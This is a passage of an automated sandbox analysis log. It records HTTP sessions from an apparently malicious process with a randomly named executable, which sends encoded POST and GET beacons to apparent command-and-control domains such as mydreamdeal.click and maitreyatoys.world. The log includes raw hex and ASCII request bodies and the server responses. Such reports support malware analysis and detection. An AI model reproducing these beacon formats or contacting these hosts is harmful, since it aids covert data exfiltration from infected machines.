                                                                      Data Ascii: xP7x=N+9LpEXYE/G8ImnBACk40XMe3Px+Qfihiqhi935SanNPr+3bARmxxrX2Ti7cUCZD92DbKC7VlLvAhvy+86QDwMB2BUWqohmtmNh2ddDwlFkZH22PIMu4iVTqv6eLmEuPooZyHBJm9qlTv/Fv8A7rUdwijYtR3g7+gNnvs8LjugVUMPNUzpFrfWEEVhiufS7f4zkwOy2pJmK+Pdr+8LMTR3h9+ibEfWTuLd12j8o4PTeulYWX3giHAoyGqaMHf3lkspw+A3UM+YUPhSYiFNsF84shtvl27OIqE1eKAjkgmvLVXsY/nJGjcz5LjYFuL1p+tEw640wJbP4KwyCzx7GJiDHy/wGiMGAaA/8/VcxnmSMKXGASaYtXKXbJ5q9U1VJAkhE3ZMgkFEUZrePKGKehbgqqLebzPyokSgWm9McFUw8PD+vG0/uI1CTRQUmgrA4OryBi4gBRj4LMBZM/UOXdlXsHMH6yLDXdXHyi27JRQOZ5+oH4FIRjVbefQPDnR5JFcUHH1d8Z20P6zZC409h9KQmxHnm1jtTxsDNhAv5OB6ujrnsXUhUb9k3IbNl8v1LFKqY5y4lfmCrkEgBni1EF6f04NNa8JeFGhVhuObMqj6cIP6hwQRw8fxm6pyhjQ8UlyQ+v9F/I6AI4He1UCJn+AO0M3mJGGuIUYO0GnQgjINVUslSHiZdA10Iq2tUh6XJcvbZfcHRq3Pz292k9UYCXHwg8GGWW+WMj3Eewbi9zrFrPsuICz/7OPKoVMNDNjleU7Lh9jC9ig5U919/CMIWC2wKHI4uS6MDonT2Cp0gTTNhxx033i0detLJTpc1vUlweEVztjuZMBUtr3LPr6iGSTDFmivkuTAZjvFNzhiBKXn4Ao2M6octpzH9dDb/Eb/9A/Yj94M2yaj6B1ru6j4nZ+/GI5d+vZTLm4lBTi25HKMoTV68Tli7SOvqJGRyhbEKX4KFJi8I/qEDODjggnLar8Nu3fLD0fUuiHUj1oZpbe3yHfZE [TRUNCATED]
                                                                      Jan 8, 2025 16:14:48.865330935 CET533INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 08 Jan 2025 15:14:48 GMT
                                                                      Server: Apache
                                                                      Content-Length: 389
                                                                      Connection: close
                                                                      Content-Type: text/html
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      32192.168.2.450034209.74.77.109803752C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 8, 2025 16:14:50.809536934 CET490OUTGET /n9b0/?F4=Q0yHy&xP7x=A8VrqyfvUbO/Hw2LPQ1UsX5BwNVpcsHZj5dGp0FbdWJo87i+fAzGqY/WbkPjYDkNrmWhazG0hIjSjfnpkftd6thTTSLohUKEi8xodPTyp3tNekr0IM36mEI= HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.dailyfuns.info
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Jan 8, 2025 16:14:51.423418045 CET548INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 08 Jan 2025 15:14:51 GMT
                                                                      Server: Apache
                                                                      Content-Length: 389
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      33192.168.2.450035188.114.96.3803752C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 8, 2025 16:14:56.479806900 CET770OUTPOST /1ag2/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.mydreamdeal.click
                                                                      Origin: http://www.mydreamdeal.click
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 201
                                                                      Connection: close
                                                                      Referer: http://www.mydreamdeal.click/1ag2/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 78 50 37 78 3d 31 58 70 66 4f 4d 31 67 73 7a 33 47 42 4f 42 41 4e 70 56 62 51 4e 6d 32 67 33 54 59 38 4f 37 62 73 6f 70 79 6a 52 48 41 41 4e 65 62 54 35 33 70 58 39 77 46 76 76 31 51 53 77 56 31 6d 46 31 6b 67 37 66 46 53 47 76 6e 6d 31 47 51 46 4c 43 78 4e 62 31 71 47 34 37 59 41 44 42 38 49 54 44 49 38 71 69 4c 38 4b 36 68 34 65 59 2f 2b 68 66 72 39 6d 2b 30 45 51 51 79 64 65 77 4b 32 36 43 6f 6f 6f 63 53 75 67 33 55 7a 37 4d 79 67 4b 49 76 5a 6a 49 41 65 4b 32 63 4d 31 6c 72 68 47 76 57 42 59 34 65 79 48 39 41 2f 4e 6e 36 32 38 4e 59 5a 45 70 33 4d 69 51 57 2f 6b 54 4f 47 6f 43 44 6d 41 3d 3d
                                                                      Data Ascii: xP7x=1XpfOM1gsz3GBOBANpVbQNm2g3TY8O7bsopyjRHAANebT53pX9wFvv1QSwV1mF1kg7fFSGvnm1GQFLCxNb1qG47YADB8ITDI8qiL8K6h4eY/+hfr9m+0EQQydewK26CooocSug3Uz7MygKIvZjIAeK2cM1lrhGvWBY4eyH9A/Nn628NYZEp3MiQW/kTOGoCDmA==
                                                                      Jan 8, 2025 16:14:57.187223911 CET1075INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 08 Jan 2025 15:14:57 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                      Expires: Wed, 08 Jan 2025 15:14:57 GMT
                                                                      Vary: Accept-Encoding
                                                                      cf-cache-status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eZWXZpUTestMV0qYYHE2M0J39ZNIz1J1MJ%2BNiLJz5QiPi6KE8pIw%2F96t3LYm3rUP9h2kkFGuoLF7aZaoYNmpm69I6NlUikaorJKRw%2Fou0vg%2BVskHH3HE2muhRthvdtOzr1cIG5JFS28%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8fed23e17e190f70-EWR
                                                                      Content-Encoding: gzip
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1765&min_rtt=1765&rtt_var=882&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=770&delivery_rate=0&cwnd=210&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a 37 30 0d 0a 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff e3 02 00 68 e7 b5 eb 93 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: f70\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.h0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      34192.168.2.450036188.114.96.3803752C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 8, 2025 16:14:59.051595926 CET790OUTPOST /1ag2/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.mydreamdeal.click
                                                                      Origin: http://www.mydreamdeal.click
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 221
                                                                      Connection: close
                                                                      Referer: http://www.mydreamdeal.click/1ag2/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 78 50 37 78 3d 31 58 70 66 4f 4d 31 67 73 7a 33 47 4f 50 52 41 49 4f 4a 62 41 64 6d 31 73 58 54 59 79 75 37 66 73 6f 6c 79 6a 51 44 51 42 2f 36 62 55 59 48 70 57 2b 6f 46 73 76 31 51 47 41 56 77 69 46 31 56 67 37 62 6e 53 48 54 6e 6d 78 57 51 46 4f 2b 78 4e 73 70 74 55 34 37 61 4c 6a 42 69 58 44 44 49 38 71 69 4c 38 4b 2b 4c 34 65 41 2f 2b 52 50 72 38 48 2b 37 4e 77 51 78 55 2b 77 4b 67 4b 44 76 6f 6f 64 46 75 68 62 74 7a 34 30 79 67 49 67 76 63 6e 55 48 51 4b 32 65 43 56 6c 2f 6d 32 53 64 44 37 5a 70 77 6e 30 67 38 2b 76 63 33 36 41 43 49 31 49 67 65 69 30 6c 69 6a 61 36 4c 72 2f 4b 39 4f 4b 6a 51 73 45 68 48 39 69 48 42 78 57 67 38 33 4b 70 58 76 6f 3d
                                                                      Data Ascii: xP7x=1XpfOM1gsz3GOPRAIOJbAdm1sXTYyu7fsolyjQDQB/6bUYHpW+oFsv1QGAVwiF1Vg7bnSHTnmxWQFO+xNsptU47aLjBiXDDI8qiL8K+L4eA/+RPr8H+7NwQxU+wKgKDvoodFuhbtz40ygIgvcnUHQK2eCVl/m2SdD7Zpwn0g8+vc36ACI1Igei0lija6Lr/K9OKjQsEhH9iHBxWg83KpXvo=
                                                                      Jan 8, 2025 16:14:59.748958111 CET1068INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 08 Jan 2025 15:14:59 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                      Expires: Wed, 08 Jan 2025 15:14:59 GMT
                                                                      Vary: Accept-Encoding
                                                                      cf-cache-status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jybOHATB0uEZm7pKu9%2BpEeRIOLFF38PJIBsVJ9Fi6yR6TUpRujWfH8p50rEUmE3FW9B2C8DNpYL8w%2B8ja7%2BeRduRXe1fFIAoEfS5nbFSk9nzy9LoTgXx0t5TJ%2BoV%2Fv6jZE2OnJl0L2M%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8fed23f17f848cdc-EWR
                                                                      Content-Encoding: gzip
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2030&min_rtt=2030&rtt_var=1015&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=790&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 37 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff e3 02 00 68 e7 b5 eb 93 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 7a\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.h0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      35192.168.2.450037188.114.96.3803752C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 8, 2025 16:15:01.604249954 CET10872OUTPOST /1ag2/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.mydreamdeal.click
                                                                      Origin: http://www.mydreamdeal.click
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 10301
                                                                      Connection: close
                                                                      Referer: http://www.mydreamdeal.click/1ag2/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 78 50 37 78 3d 31 58 70 66 4f 4d 31 67 73 7a 33 47 4f 50 52 41 49 4f 4a 62 41 64 6d 31 73 58 54 59 79 75 37 66 73 6f 6c 79 6a 51 44 51 42 2f 79 62 55 76 76 70 58 66 6f 46 74 76 31 51 61 51 56 78 69 46 31 79 67 37 6a 6a 53 48 66 52 6d 33 4b 51 45 73 6d 78 4c 64 70 74 65 34 37 61 45 44 42 6a 49 54 44 5a 38 71 79 50 38 4b 4f 4c 34 65 41 2f 2b 54 48 72 31 32 2b 37 42 51 51 79 64 65 77 47 32 36 43 49 6f 6f 30 77 75 68 66 69 7a 6f 55 79 75 49 51 76 65 79 49 48 63 4b 32 59 46 56 6b 34 6d 32 65 53 44 37 31 66 77 6d 78 33 38 35 76 63 30 65 78 4b 4e 56 4d 59 41 45 34 4c 2b 41 43 53 51 4c 79 4e 6c 64 47 67 57 38 59 5a 61 4d 36 65 4f 51 44 38 67 30 47 72 55 2f 73 61 74 58 54 76 61 78 4c 37 7a 51 79 57 6c 79 77 58 77 37 34 79 57 71 44 32 53 43 4e 75 52 48 4b 7a 2f 70 64 76 64 78 45 36 34 6c 6d 6a 5a 6b 53 67 35 32 55 68 58 7a 4e 57 6b 67 65 44 6c 55 48 54 4b 78 67 62 36 51 55 48 34 65 43 45 6b 30 51 61 5a 4e 61 67 46 41 76 35 44 4b 57 66 52 4a 76 58 56 64 56 2b 70 54 69 67 74 31 44 64 66 75 44 46 5a 55 33 62 4e [TRUNCATED]
                                                                      Data Ascii: xP7x=1XpfOM1gsz3GOPRAIOJbAdm1sXTYyu7fsolyjQDQB/ybUvvpXfoFtv1QaQVxiF1yg7jjSHfRm3KQEsmxLdpte47aEDBjITDZ8qyP8KOL4eA/+THr12+7BQQydewG26CIoo0wuhfizoUyuIQveyIHcK2YFVk4m2eSD71fwmx385vc0exKNVMYAE4L+ACSQLyNldGgW8YZaM6eOQD8g0GrU/satXTvaxL7zQyWlywXw74yWqD2SCNuRHKz/pdvdxE64lmjZkSg52UhXzNWkgeDlUHTKxgb6QUH4eCEk0QaZNagFAv5DKWfRJvXVdV+pTigt1DdfuDFZU3bNt6s3c8B6NJHlHBV+f4gqWe6Aw4r+xz1NOUCF5YxuzICeMm40HtgckwDrGAnWbCOT6AOBYoF/8bmUS1ZO6yU7dtkWqdLtJnyUBOU5gsyE4Tf7ll7fgNf2rK2RuAqeCubeZkDPhpRQEC9ajupv3HbmK7KaeiFT52tc7ccraS/V6NdZe7CTN0VZWpUiKM0AZWsqFZAhBAbSN6T7YdlZEbZsNARvV1cCegcnTm7pIrad2wnmzpmKzKYF4Ffk84rVbYb4ZhJads8Sfy1Hyadhom7vXua67jHPyXIJ4qsAVBPON6brMwFNeX+nszAzap0hSBxo4q+xLtB14Q0ZGaqpVNwWz/JYXKnYsTDMie5JEn1NlnnDYFl5Je96V7ceNKpveA3gtBQiVyFCKS3gDaxCXsb11HVd4n90iO+4v2DSqR1MWymodfhCsuyvfbE9evgrjJrTIa7tcdSwJzDtcE9wMflr+p9XczxZysXAhwAkSuqRrXrXeWmiQGoFbzvyePw4jaf+FYoatOJU9Q5Uaadn0RGod1PB2EV3PPscEpzNSsv7BD2mTHdm09zMeLlJ7U1h3ddMe+RBl615r8IPZzgjBQf3SW8y7lZnmnSIWuxlSkDevHMQIS20TWclscvxZHllsENjhTHvCNz4pWhs1AxCxeCJf6kxGVrhUBm8ik [TRUNCATED]
                                                                      Jan 8, 2025 16:15:02.352977037 CET1052INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 08 Jan 2025 15:15:02 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                      Expires: Wed, 08 Jan 2025 15:15:02 GMT
                                                                      Vary: Accept-Encoding
                                                                      cf-cache-status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0bmHic3xQQQFH9%2FrgA7V0HODBCP%2FrwI4z6Q1F7qfKJpUFXk1wZlB09t0tOr4yfgw7nFGQ5P%2F84Xo%2BJtUf3i1muBzfE8OEC6TpBNxjuwtvDLiAfxVlpEzDOX05SpGJJWTxH5R6ImEk3I%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8fed24018f274205-EWR
                                                                      Content-Encoding: gzip
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1713&min_rtt=1713&rtt_var=856&sent=4&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10872&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 36 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff 0d 0a
                                                                      Data Ascii: 6f\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.
                                                                      Jan 8, 2025 16:15:02.354298115 CET21INData Raw: 62 0d 0a e3 02 00 68 e7 b5 eb 93 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: bh0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      36192.168.2.450038188.114.96.3803752C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 8, 2025 16:15:04.154334068 CET493OUTGET /1ag2/?xP7x=4VB/N4F6tibqC9FQILosJ+n1llTK4MiF4YtEqiz3GsaSMOHPZtZI38ZqeQNXmBxLoc2gIm7YkXHcJ/CISLsxa/r9DhwgcU3z86+N04yu78wK1Du9wX32CCg=&F4=Q0yHy HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.mydreamdeal.click
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Jan 8, 2025 16:15:04.892368078 CET1068INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 08 Jan 2025 15:15:04 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                      Expires: Wed, 08 Jan 2025 15:15:04 GMT
                                                                      Vary: Accept-Encoding
                                                                      cf-cache-status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j5Uvh9s%2FcUrTyweVGtBN4pIsqy9abNbyWxw8Yjtg0Q1VkgvK7JKYoDTFzyCtjozq7u9VC0nN3Zy46SrBZmlrdzTa3%2FedcNK9dt4Taf%2F%2FxcDqOnH5ky73Gp5a%2Fr9e2M6NaqgveTwL6tk%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8fed2411787f7cee-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1924&min_rtt=1924&rtt_var=962&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=493&delivery_rate=0&cwnd=174&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 39 33 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 93<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0</center></body></html>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      37192.168.2.450039194.245.148.189803752C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 8, 2025 16:15:09.992022991 CET773OUTPOST /dvmh/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.maitreyatoys.world
                                                                      Origin: http://www.maitreyatoys.world
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 201
                                                                      Connection: close
                                                                      Referer: http://www.maitreyatoys.world/dvmh/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 78 50 37 78 3d 6c 48 67 6b 62 2b 61 38 6d 43 6e 63 43 4a 63 67 76 59 4c 67 53 6e 35 33 65 64 43 71 36 64 63 46 5a 30 61 57 7a 32 7a 73 71 46 42 2b 67 45 4b 43 70 6f 76 6e 33 31 4d 5a 69 79 34 74 6f 55 73 58 50 6b 62 54 2b 4c 35 57 59 68 67 35 45 6e 54 5a 44 34 32 5a 49 57 36 79 39 72 67 6e 46 62 53 68 6d 52 65 2f 59 6e 2b 61 52 66 4e 44 52 46 73 5a 77 46 30 68 64 56 48 52 61 33 4b 71 68 6c 31 69 74 4f 4a 76 64 68 71 56 58 6d 57 74 39 56 4c 33 2b 69 55 4e 31 32 42 2b 45 70 6d 57 4a 4d 4f 33 78 78 73 4b 2f 5a 71 4b 4b 4f 64 6d 6f 75 72 2b 36 4a 35 2b 64 6f 4f 6e 67 34 42 2b 64 63 76 56 62 77 3d 3d
